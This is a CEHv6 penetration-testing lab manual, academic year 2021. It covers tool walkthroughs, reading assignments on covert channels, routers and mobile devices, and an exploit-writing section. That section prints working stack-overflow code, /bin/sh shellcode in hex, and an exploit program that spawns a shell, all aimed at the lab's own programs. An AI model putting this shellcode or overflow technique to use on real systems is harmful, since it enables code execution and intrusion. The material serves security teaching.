
Module 26. Penetration Testing


Academic year: 2021


Module 26

Penetration Testing

Lab 26-01

Objective:

Use Azure Web Log to view details about your web traffic.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch Azure Web Log
• Start a new project from Project -> New. Enter the data and click Ok
• Start a new log file from File -> Add Log
• Click Hits and Refs
• Click Site Info
• Click Current Month
• Click Previous Month
• Click Year Hits
• Click Hour
• Click System
• Country

Lab 26-02

Objective:

Use iInventory to capture hardware & software inventory and registry keys without having to leave your desk.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch iInventory
• Click the Audit this PC button in the left side pane to start the performance audit
• Performance Audit Report
• Click the Scan Network button on the left side pane
• Click Agent Builder Wizard on the left pane
• Set the options and click Next to forward to the next step
• Click the Show Agent Config button on the left side pane
• Select an agent file from the list to display its summary
• Summary of agent configuration

Lab 26-03

Objective:

Use Link Utility to check links on Web sites and sustain their efficiency.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch Link Utility
• Click the New Project button
• Click Import from HTML File. Select a file to import site addresses from. Click Ok
• Click the Settings button to change the present options
• Click the Scan button. Click Yes
• Click on the Report to generate the report file

Lab 26-04

Objective:

Use MaxCrypt to perform automated computer encryption.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch MaxCrypt
• Click on New User to create a new user
• Now log in
• Click on the MaxCrypt icon in the Windows system tray to access the MaxCrypt Quick Menu
• Click on Manage Volumes
• Click on the Create Volume button to create a new volume
• Enter the data and click Create Volume
• The new volume F:\ is created
• Click on the MaxCrypt icon in the Windows system tray to access the MaxCrypt Quick Menu
• Click on Conceal Files
• Select a file and click the Add button
• Finally, log out the user

Lab 26-05

Objective:

Use Sniffem to monitor the network and capture data traffic.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch Sniffem
• Click the Settings button to modify the present settings
• Click the Capture button to start capturing the activities
• Click the Stop button to stop capturing

Lab 26-06

Objective:

Use SQL Stripes to monitor and control your SQL Servers.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch SQL Stripes
• Click Yes
• Select Settings to modify the present options
• Select Server from the left side pane in the above window and click the + symbol button in the right side pane to create a new server
• Enter the details and click OK to create a new server
• Server 1 Created
• Check the Console

Lab 26-07

Objective:

Use the TraceRoute program to learn the route over the network between two systems, listing all the intermediate routers on the path to the destination.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch TraceRoute
• Input the URL www.juggyboy.com in the Address bar. Click Trace
• Trace Result
• Repeat the same for other sites

Lab 26-08

Objective:

Use Windows Security Officer to restrict the resources for an application.

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Install and launch Windows Security Officer
• First, click to change the administrator password
• Expand System 10 options in the left side pane
• Select Control Panel to modify the options
• Select Shell Restrictions to modify the options
• Select IE Browser Security to modify the options
• Select IE Cookies Viewer to modify the options
• Select Log User Activity to modify the options
• Select Restrict User Work Time to modify the options
• Select Folder Guard to modify the options

Lab 26-09

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Open the Penetration Testing.pdf and read the content Develop a penetration test plan

Lab 26-10

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Open the Software Penetration Testing.pdf and read the content Penetration testing today

Module 27

Covert Hacking

Lab 27-01

• In the CEHv6 Labs CD-ROM, navigate to Module 27
• Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels

Lab 27-02

• In the CEHv6 Labs CD-ROM, navigate to Module 27
• Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks)
• In the same PDF file, read the Examples of Covert Channel Attacks topic

Lab 27-03

• In the CEHv6 Labs CD-ROM, navigate to Module 27
• Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack

Lab 27-04

• In the CEHv6 Labs CD-ROM, navigate to Module 27
• Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels

Module 30

Exploit Writing

Lab 30-01

• In the CEHv6 Labs CD-ROM, navigate to Module 30
• Boot your computer using the BackTrack CD-ROM
• Open a command shell and type: kedit example1.c
• Type the following in kedit:

    void function(int a, int b, int c) {
        /* Two local buffers, allocated on the stack */
        char buffer1[5];
        char buffer2[10];
    }

    void main() {
        function(1,2,3);
    }

• Save the program in kedit.
• Compile the program by typing: $ gcc -S -o example1.s example1.c
• View the generated assembly file by typing: kedit example1.s

Lab 30-02

example2.c

• In the CEHv6 Labs CD-ROM, navigate to Module 30
• Create another program in kedit: kedit example2.c
• Type the following:

    #include <string.h>

    void function(char *str) {
        char buffer[16];

        /* Unbounded copy: str is far larger than the 16-byte buffer */
        strcpy(buffer, str);
    }

    void main() {
        char large_string[256];
        int i;

        for (i = 0; i < 255; i++)
            large_string[i] = 'A';

        function(large_string);
    }

• Save the program in kedit.
• Compile the program by typing: $ gcc -o example2.s example2.c
• Run the program by typing: ./example2.s
• You should see a segmentation fault error
• View the generated assembly file by typing: kedit example2.asm
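The segmentation fault in example2.c comes from strcpy() copying with no regard for the 16-byte destination. The hardened counterpart below is an added example, not part of the original lab; copy_bounded and function_hardened are hypothetical names and the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 16  /* same size as buffer[] in example2.c */

/*
 * Hypothetical helper (not from the lab): copy src into dst only if the
 * whole string, terminating NUL included, fits in dst_len bytes.
 * Returns 0 on success, -1 on rejection (dst is then an empty string).
 */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = 0;

    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src, but never read past what dst could hold. */
    while (n < dst_len && src[n] != '\0')
        n++;
    if (n == dst_len)
        return -1;              /* too long: reject, do not truncate */

    memcpy(dst, src, n + 1);    /* n + 1 <= dst_len, NUL included */
    return 0;
}

/* Hardened counterpart of function() from example2.c. */
int function_hardened(const char *str)
{
    char buffer[BUF_LEN];
    return copy_bounded(buffer, sizeof buffer, str);
}

int main(void)
{
    char large_string[256];

    /* Constructed input: 255 'A' bytes plus a terminator. */
    memset(large_string, 'A', sizeof large_string - 1);
    large_string[sizeof large_string - 1] = '\0';

    printf("oversized input: %d\n", function_hardened(large_string));
    printf("short input:     %d\n", function_hardened("hello"));
    return 0;
}
```

Compiler mitigations such as -fstack-protector and _FORTIFY_SOURCE turn the original overflow into a controlled abort, but rejecting the oversized input at the copy is what removes the bug.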

Lab 30-03

Objective:

example3.c

• In the CEHv6 Labs CD-ROM, navigate to Module 30
• Create another program in kedit: kedit example3.c
• Type the following:

    #include <stdio.h>

    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
        int *ret;

        ret = (int *)(buffer1 + 12);
        (*ret) += 8;
    }

    void main() {
        int x;

        x = 0;
        function(1,2,3);
        x = 1;
        printf("%d\n",x);
    }

• Save the program and compile it by typing: $ gcc -o example3 example3.c
• Run the program by typing: $ ./example3
• It should print one
• Disassemble main using gdb
• Type the following: $ gdb example3
• Type: disassemble main

Lab 30-04

Objective:

shellcode.c

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Create another program in kedit: kedit shellcode.c
• Type the following:

    #include <stdio.h>
    #include <unistd.h>

    void main() {
        char *name[2];

        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
    }

• Compile the program by typing:

    $ gcc -o shellcode -ggdb -static shellcode.c

• Type:

    $ gdb shellcode

• Then, type disassemble main.
• Type disassemble _execve

Lab 30-05

Objective:

exit.c

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Create another program in kedit: kedit exit.c
• Type the following:

    #include <stdlib.h>

    void main() {
        exit(0);
    }

• Compile the program using:

    $ gcc -o exit -static exit.c

• View the generated code in gdb by typing:

    gdb exit

• Then:

    disassemble _exit

Lab 30-06

Objective:

testsc.c

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Create another program in kedit: kedit testsc.c
• Type the following:

    char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

    void main() {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
    }

• Compile the program using:

    $ gcc -o testsc testsc.c

• Run the program by typing:

    ./testsc

• You should see a shell launched.
• Type exit to exit the shell.

Lab 30-07

Objective:

exploit.c

• In the CEHv6 Labs CD-ROM, navigate to Module 26
• Create another program in kedit: kedit exploit.c
• Type the following:

    #include <string.h>

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char large_string[128];

    void main() {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;

        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int) buffer;

        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];

        strcpy(buffer,large_string);
    }

• Compile the program using:

    $ gcc -o exploit exploit.c

• Run the program by typing:

    ./exploit

• You should see a shell launched
• Type exit to exit the shell

Module 34

Mac OS X Hacking

Lab 34-01

• In the CEHv6 Labs CD-ROM, navigate to Module 34
• Open the Securing Mac OS X.pdf and read the content
• Read the Security Hardening Guideline topic
• In the same PDF file, read the Data Encryption topic

Lab 34-02

• In the CEHv6 Labs CD-ROM, navigate to Module 34
• Open the Security in Mac OS X.pdf and read the content
• Read the Secure Default Settings topic
• In the same PDF file, read the Modern Security Architecture topic
• Next, read the Strong Authentication topic

Lab 34-03

• In the CEHv6 Labs CD-ROM, navigate to Module 34
• Open the Mac OS X 10.4 Security Checklist.pdf and read the content
• Read the OS X Security Architecture topic
• In the same PDF file, read the User Account Security topic
• Next, read the Securing System Preferences topic

Lab 34-04

• In the CEHv6 Labs CD-ROM, navigate to Module 34
• Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content
• Read the Mac OS X Hacking Poses Wide Risk… for Windows topic

Module 35

Hacking Routers, Cable Modems, and Firewalls

Lab 35-01

• In the CEHv6 Labs CD-ROM, navigate to Module 35
• Open the Chapter 9-Firewalls.pdf and read the content
• Read the FIREWALL IDENTIFICATION topic
• Next, read the PACKET FILTERING topic

Lab 35-02

• In the CEHv6 Labs CD-ROM, navigate to Module 35
• Open the CISCO ROUTERS AS TARGETS.pdf and read the content
• Read the Compromised Router Sniffing topic
• In the same PDF file, read the Why we need to protect router resources topic
• Next, read the Router Audit Tool topic

Lab 35-03

• In the CEHv6 Labs CD-ROM, navigate to Module 35
• Open the Cisco Router Security Best Practices.pdf and read the content
• Read the Access management topic
• In the same PDF file, read the SNTP Security topic
• Next, read the Access control lists topic

Lab 35-04

• In the CEHv6 Labs CD-ROM, navigate to Module 35
• Open the 8 steps to protect your Cisco router.pdf and read the content
• In the same PDF file, read the Encrypt all passwords topic

Module 36

Hacking Mobile Phones, PDA, and Handheld Devices

Lab 36-01

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the Take Control of Your iPhone.pdf and read the content
• Read the QUICK START TO TAKING CONTROL OF AN iPHONE topic
• In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic
• Next, read the AVOID NAVIGATION AND TYPING HASSLES topic

Lab 36-02

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the iphone Hardware Unlock.pdf and read the content

Lab 36-03

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the How to Unlock an iPhone.pdf and read the content

Lab 36-04

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the The Anatomy of a Hack.pdf and read the content.
• Read the Understanding the Threats to Your Mobile Workforce topic
• In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic

Lab 36-05

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the Mobile Handset Security.pdf and read the content
• Read the Security issues on mobile devices topic
• In the same PDF file, read the Threats and Attacks topic

Lab 36-06

• In the CEHv6 Labs CD-ROM, navigate to Module 36
• Open the Mobile Malware Threats and Prevention.pdf and read the content
